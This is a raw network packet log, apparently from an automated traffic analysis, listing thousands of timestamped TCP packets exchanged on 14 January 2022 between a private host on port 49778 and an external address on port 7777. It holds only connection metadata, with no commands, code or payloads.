                                                                                                                                  Jan 14, 2022 14:10:41.411803007 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.411839008 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.411890030 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.411928892 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.411937952 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.411989927 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.412029982 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.412046909 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.412097931 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.412137985 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.412159920 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.412209034 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.412250996 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.412256956 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.412311077 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.412349939 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.412359953 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.412410975 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.412458897 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.412463903 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.412508011 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.412556887 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.412559986 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.412606955 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.412655115 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.412664890 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.412703991 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.412751913 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.412754059 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.412801027 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.412841082 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.412849903 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.412899971 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.412936926 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.412950039 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.412997961 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.413038015 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.413045883 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.413094997 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.413134098 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.413142920 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.413191080 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.413228035 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.413239002 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.413288116 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.413325071 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.413336039 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.413384914 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.413422108 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.413434029 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.413482904 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.413520098 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.413532019 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.413582087 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.413619041 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.413630009 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.413678885 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.413717031 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.413727045 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.413775921 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.413816929 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.413824081 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.413902998 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.413953066 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.413954973 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.439420938 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.439492941 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.439500093 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.439558029 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.439615011 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.439625025 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.439677954 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.439717054 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.439730883 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.439784050 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.439821959 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.439836025 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.439887047 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.439929962 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.439938068 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.439989090 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.440036058 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.440041065 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.440093040 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.440133095 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.440145969 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.440196991 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.440236092 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.440248966 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.440299988 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.440337896 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.440340996 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.440392017 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.440433979 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.440440893 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.440494061 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.440535069 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.440548897 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.440603018 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.440642118 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.440654039 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.440705061 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.440743923 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.440756083 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.440807104 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.440850973 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.440856934 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.440908909 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.440949917 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.440958977 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.441009998 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.441049099 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.441061974 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.441112995 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.441154957 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.441163063 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.441215038 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.441255093 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.441267014 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.441318035 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.441359043 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.441368103 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.441420078 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.441458941 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.441471100 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.441523075 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.441564083 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.441574097 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.441625118 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.441664934 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.441674948 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.441725969 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.441764116 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.441776037 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.441827059 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.441865921 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.441911936 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.469265938 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.469351053 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.469360113 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.469408035 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.469451904 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.469458103 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.469510078 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.469547987 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.469564915 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.469615936 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.469655037 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.469666004 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.469724894 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.469768047 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.469777107 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.469827890 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.469865084 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.469918013 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.469969034 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.470010042 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.470017910 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.470067978 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.470113039 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.470118046 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.470170975 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.470211983 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.470220089 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.470271111 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.470309973 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.470319986 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.470371008 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.470408916 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.470419884 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.470470905 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.470508099 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.470519066 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.470572948 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.470611095 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.470622063 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.470673084 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.470714092 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.470724106 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.470773935 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.470813036 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.470823050 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.470874071 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.470915079 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.470925093 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.470974922 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.471016884 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.471023083 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.471074104 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.471112013 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.471122026 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.471174002 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.471213102 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.471223116 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.471272945 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.471311092 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.471321106 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.471371889 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.471407890 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.471420050 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.497014046 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.497036934 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.497061014 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.497080088 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.497085094 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.497098923 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.497102022 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.497121096 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.497131109 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.497140884 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.497160912 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.497179031 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.497179985 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.497200012 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.497209072 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.497220039 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.497237921 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.497248888 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.497257948 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.497278929 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.497286081 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.497298002 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.497317076 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.497328043 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.497338057 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.497358084 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.497369051 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.497376919 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.497395992 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.497404099 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.497415066 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.497441053 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.497448921 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.497469902 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.497492075 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.497500896 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.497512102 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.497533083 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.497545004 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.497551918 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.497579098 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.497581005 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.497601986 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.497620106 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.497631073 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.497647047 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.497673988 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.497675896 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.497694016 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.497721910 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.497723103 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.497749090 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.497771978 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.497780085 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.497801065 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.497828007 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.497836113 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.497859955 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.497875929 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.497895956 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.497899055 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.497920990 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.497942924 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.497942924 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.497963905 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.497980118 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.497983932 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.498003960 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.498022079 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.498034000 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.498042107 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.498050928 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.498061895 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.498080969 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.498094082 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.498105049 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.498119116 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.498137951 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.498159885 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.498162031 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.498179913 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.498195887 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.498199940 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.498219967 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.498223066 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.498240948 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.498255968 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.498262882 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.498281956 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.498296022 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.498302937 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.498321056 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.498334885 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.498341084 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.498359919 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.498368979 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.498378992 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.498398066 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.498408079 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.498416901 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.498436928 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.498445988 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.498456001 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.498475075 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.498486042 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.498495102 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.498539925 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.498554945 CET77774977845.82.70.152192.168.2.4
